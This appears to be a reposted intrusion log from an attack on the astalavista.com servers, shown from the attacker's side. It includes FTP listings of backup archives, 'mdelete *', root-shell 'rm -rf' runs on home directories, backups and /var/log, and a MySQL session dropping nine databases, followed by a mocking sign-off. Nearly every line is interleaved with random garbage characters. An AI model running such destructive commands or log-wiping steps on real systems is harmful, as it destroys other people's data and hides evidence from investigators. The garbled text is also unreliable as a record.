-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar7 [& h1 y: m- X- e- ^' Z, m4 N
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar6 h' b, y- ^0 _/ M1 y3 A/ n
[snip]
. I' i' l. } {) l6 [1 N8 R226 Transfer complete.% J( E0 x; u! W$ G6 p$ o
ftp> mdelete *
4 s9 R. n! j8 o, ^6 t$ d. Uftp> ls -la6 Q. U3 ~. ?! h5 s
227 Entering Passive Mode (212,254,194,163,2,193). e; `8 } E6 ?$ N
150 Opening BINARY mode data connection for ‘file list’.
1 ^9 O- t1 n; U# \6 y. w3 x226 Transfer complete.* \7 j3 Y- U. ?* I5 q. i3 i+ b& F
ftp>/ K- i6 a# `3 R/ ]! h
4 n/ d, ?- {7 Zsh-3.2# cd /home
4 u$ G+ I! |" ~3 Hsh-3.2# ls -la% d4 e8 X* N' j
total 120
, b) p$ t9 A" L- b& X/ G3 k' Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
+ q: X0 D* s' d: E( C7 udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..3 E7 j" p0 L- ]# o
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
% Z" @+ ^& e0 O& m# ^5 V( `-rw——- 1 root root 8192 Jun 4 03:03 aquota.group+ A) ^# k g5 m4 M
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
, J+ R( \# N- P0 R! v4 \- H6 P; ?6 sdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet, B) d# j* k0 Q0 T
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
( _, Z) {2 X; l) Kdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141618 D# [, h8 s' I1 q9 h, Q' d- i
drwx–x–x 10 com com 4096 Apr 28 12:40 com
' W$ ?- v: u6 j8 k" A! y( {4 @drwxr-xr-x 2 root root 4096 May 17 2007 ftp
7 i. _, {7 Q" bdrwx—— 3 jon jon 4096 Sep 21 2007 jon
y( r' H: D6 V" o$ tdrwx—— 2 root root 16384 Sep 11 2007 lost+found
5 @2 T+ r: m$ z/ p9 \' m+ Qdrwxr-xr-x 2 root root 4096 Sep 14 2007 my% W' Y* c4 \3 K" W% ]4 d
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
* U+ H; V8 u* t1 C5 T) Cdrwx—— 2 jon jon 4096 Sep 15 2007 test
$ P% s+ A8 I' h9 ]4 udrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
* a% r- l/ [8 c/ N
8 j+ \5 s2 o) I) A- @# ^sh-3.2# rm -rf backup/
8 F j4 N$ {+ x1 H5 {6 d; m6 Hsh-3.2# rm -rf backup.14161/! Z( p9 w& v0 X; D
sh-3.2# rm -rf ftp/
9 r' p5 j1 B$ h2 o9 Y Psh-3.2# rm -rf jon/
) W- ~. y! w* K4 vsh-3.2# rm -rf my/9 R# b+ D+ E5 w6 k
sh-3.2# rm -rf mysqldata/
9 Q- w7 V, f1 ^1 o! X4 Q& {sh-3.2# rm -rf test/4 \: O2 g8 n/ ^
sh-3.2# rm -rf tmp/$ M' ], s i3 o6 T9 k
sh-3.2# cd ~
" W( d' o& X! K7 ^sh-3.2# rm -rf *6 j2 u( i U- p, x2 a
sh-3.2# rm -rf /var/log/9 j' p/ N+ R( ?, h
rm: cannot remove directory `/var/log//proftpd’: Directory not empty3 E% z; [/ r4 R1 ]# F+ l
sh-3.2# rm -rf /home/*
3 n2 X5 S# g; ]sh-3.2# mysql
3 l9 H7 w1 N8 YWelcome to the MySQL monitor. Commands end with ; or \g.
, q5 t$ ^0 y4 Y& oYour MySQL connection id is 407156
9 s8 t$ H2 q' B7 ]2 \5 F! p4 E8 iServer version: 5.0.45-community-log MySQL Community Edition (GPL)
) j) G1 C# f, o' C' u D) _+ F! |9 x- D2 L
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
6 n6 x! S n( X8 }$ Z
% o Y. A. c |# d( N) ~mysql> show databases;
# q. h; {7 A$ }; ^( G9 X: j+———————–+ L" v2 V5 K) J& Q& F% ?
| Database |1 G& F2 M: I% O& f! ?
+———————–+
5 I9 n9 w3 J0 C8 M5 Q| information_schema |
% N7 C5 }' D' D7 G1 j" l| astanet_ads |8 t" z& h5 M- P. \) v, q5 I
| astanet_mailing_lists |
' c6 g) E$ T/ B! J| astanet_mediawiki | J8 L. ^8 n$ B! q4 `: m* l) ~
| astanet_membersystem |4 |- A4 Q f. o1 @( A' \4 b& C3 h+ f
| com_contrexx |
# B! T1 e% Z, r4 X; W- \| com_contrexx2 |% N. |3 o. T; U' w" o, R0 L x
| com_contrexx2_live |4 f1 l5 E8 Z( d% r3 A
| da_roundcube |
$ m) n# q* h# \/ U. y e| dolphin |) x7 v7 \' N' V6 l
| ideapool |
8 @, g" `1 O3 K8 \: R) n4 n* Y| mysql |
& o3 t. B' ^( i; n. M| test |/ N3 h, E7 U0 \% H2 D" s& T5 v
| yourmaster |: `9 N- ]9 d W0 r; M
+———————–+
5 D3 k% b) O: z9 {7 U1 o14 rows in set (0.03 sec)
1 P) {- l" F# K' y1 A4 n2 @! Q& ^% L1 W0 `) J( B, I4 M+ M' L
mysql> drop database astanet_membersystem;
2 u6 C j. U' BdroQuery OK, 46 rows affected (0.81 sec)
; c" t. W% T2 w3 s$ h7 E5 Q% z4 x- z2 a( h; ~; o6 R) M
mysql> drop database com_contrexx;
5 T* o% K7 s' DQuery OK, 211 rows affected (2.72 sec)
- Q* M0 r, P- h2 }+ b7 J. K& k% q+ Q) c4 l# t; A7 m# E' w
mysql> drop database com_contrexx2;0 a3 P- S. x( b- ?$ ?! L, S& M U. X
Query OK, 237 rows affected (2.23 sec)2 W! V% b7 k) F
: T0 u7 d) N# i. z$ _: dmysql> drop database com_contrexx2_live;9 U. ^5 ~ e- v, F! ]3 Q- m8 _
Query OK, 227 rows affected (7.63 sec)4 Q& R# F: B: X5 D* D$ q& `; C2 V/ a
' A" U8 O4 @& u7 t: V8 b3 o
mysql> drop database ideapool;3 A `6 H6 C3 ]0 V- G7 P
Query OK, 69 rows affected (0.19 sec)5 M3 `, E) m9 }8 j
- L$ ?' m0 v! d* l- R. ]6 vmysql> drop database yourmaster;' M; B% z" P6 R1 z) j" \
Query OK, 158 rows affected (0.55 sec): f, W1 ^8 }2 _$ V, u j
- F& X8 Q3 F2 m0 Bmysql> drop database astanet_ads;1 z& n0 r6 i- |) `" i! p
Query OK, 9 rows affected (0.11 sec)
0 K' q, c0 ?7 m6 u. t1 @% F. y: H( y
J8 a; a) B- Gmysql> drop database astanet_mailing_lists;
( j9 k2 K" N" V2 m# lQuery OK, 24 rows affected (1.47 sec)& h% N$ O! K0 ^+ p
4 ]0 Q/ f! U" ]( v7 f2 T3 |7 Y
mysql> drop database astanet_mediawiki;# Z+ V9 w' x0 P0 u& _' U6 s' R
Query OK, 31 rows affected (0.51 sec)
3 l9 h4 v& i1 q% @
( ?+ I3 }! o2 ]2 R4 vmysql> show databases;
. O8 p( E7 F6 r+——————–+
5 C% C1 [! {. |+ I( h; p% c| Database |
, Q; S3 {# F& c+ [" R+——————–+
5 _5 Z1 _/ V7 }3 H" b| information_schema |+ K7 p B1 s. c! e( [8 G$ d! M0 e
| da_roundcube |
& t3 Q% e3 o3 \3 P6 J! _6 || dolphin |
/ V3 L S" n$ p, ?* m! r, j| mysql |( r( N! ~7 x2 y0 i+ s
| test |
s. `. m# N. ~0 ]" w$ Q+——————–+
; z# Q( y9 e3 @/ y0 |5 rows in set (0.00 sec); I5 N+ j/ } H2 A( f
( K3 ^6 {/ p7 k
What a journey! We’re not sure exactly why the “Terminator” had any influence on# F* m7 U' B, ^$ K3 F2 r5 ] R
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
2 Y( i- H; X' X% X! Twrong to say this pack of morons *wont be back*.
! S' a$ r$ z/ E2 u" D/ E |
发表于 2012-11-6 21:07:34
收藏
支持
反对